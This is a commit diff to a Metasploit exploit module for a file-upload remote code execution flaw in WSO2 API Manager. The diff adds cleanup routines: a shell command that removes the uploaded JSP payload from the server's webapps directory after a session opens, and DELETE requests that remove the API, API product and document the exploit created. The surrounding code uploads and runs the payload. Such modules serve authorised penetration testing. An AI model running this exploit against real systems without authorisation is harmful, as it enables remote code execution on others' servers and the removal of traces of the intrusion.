Added cleanup method

rapid7 · Dec 8, 2024 · f3f1c89 · f3f1c89
1 parent c953601
commit f3f1c89
Showing 1 changed file with 61 additions and 7 deletions.
diff --git a/modules/exploits/multi/http/wso2_api_manager_file_upload_rce.rb b/modules/exploits/multi/http/wso2_api_manager_file_upload_rce.rb
@@ -7,7 +7,6 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::FileDropper
   prepend Msf::Exploit::Remote::AutoCheck
 
   attr_accessor :bearer
@@ -275,7 +274,7 @@ def create_api
   end
 
   def create_product_api
-    api_id = create_api['id']
+    @api_id = create_api['id']
 
     product_api_data = {
       'name' => Faker::App.name,
@@ -284,7 +283,7 @@ def create_product_api
       'apis' => [
         {
           'name' => '',
-          'apiId' => api_id,
+          'apiId' => @api_id,
           'operations' => [],
           'version' => '1.0.0'
         }
@@ -304,6 +303,8 @@ def create_product_api
 
     fail_with(Failure::UnexpectedReply, 'Failed to create API Product') unless res&.code == 201
 
+    @api_created = true
+
     print_good('API Product created successfully')
 
     return res.get_json_document
@@ -357,7 +358,7 @@ def upload_payload(api_id, doc_id)
     fail_with(Failure::UnexpectedReply, 'Payload upload attempt failed') unless res&.code == 201
 
     print_good('Payload uploaded successfully')
-    register_file_for_cleanup(jsp_filename)
+
     return res
   end
 
@@ -380,19 +381,72 @@ def exploit
     authenticate unless bearer
     api_avaliable = list_product_api
     api_avaliable.each do |product_api|
-      doc_id = create_document(product_api['id'])
-      next unless doc_id
+      @product_api_id = product_api['id']
+      @doc_id = create_document(@product_api_id)
+      next unless @doc_id
 
-      res = upload_payload(product_api['id'], doc_id)
+      res = upload_payload(@product_api_id, @doc_id)
       if res&.code == 201
         execute_payload
         break
       end
     end
   end
 
+  def on_new_session(session)
+    super
+    # Registering for cleanup doesn't work as the file is not placed in the CWD, and the WSO2_SERVER_HOME might vary
+    session.shell_command_token("rm -rf $WSO2_SERVER_HOME/repository/deployment/server/webapps/authenticationendpoint/#{jsp_filename}")
+  end
+
+  def cleanup
+    return unless session_created?
+
+    super
+
+    # If we have created the API, we need to delete it; thus the documentation
+    return delele_product_api && delele_api if @api_created
+
+    # If the API was already there, we deleted only the documentation.
+    delete_document
+  end
+
   def jsp_filename
     @jsp_filename ||= "#{rand_text_alphanumeric(8..16)}.jsp"
   end
 
+  def delete_document
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, '/api/am/publisher/', target.opts['api_version'], '/api-products/', @api_id, '/documents/', @doc_id),
+      'method' => 'DELETE',
+      'headers' => {
+        'Authorization' => "Bearer #{bearer}"
+      }
+    )
+
+    return res&.code == 200
+  end
+
+  def delele_api
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, '/api/am/publisher/', target.opts['api_version'], '/apis/', @api_id),
+      'method' => 'DELETE',
+      'headers' => {
+        'Authorization' => "Bearer #{bearer}"
+      }
+    )
+    return res&.code == 200
+  end
+
+  def delele_product_api
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, '/api/am/publisher/', target.opts['api_version'], '/api-products/', @product_api_id),
+      'method' => 'DELETE',
+      'headers' => {
+        'Authorization' => "Bearer #{bearer}"
+      }
+    )
+    return res&.code == 200
+  end
+
 end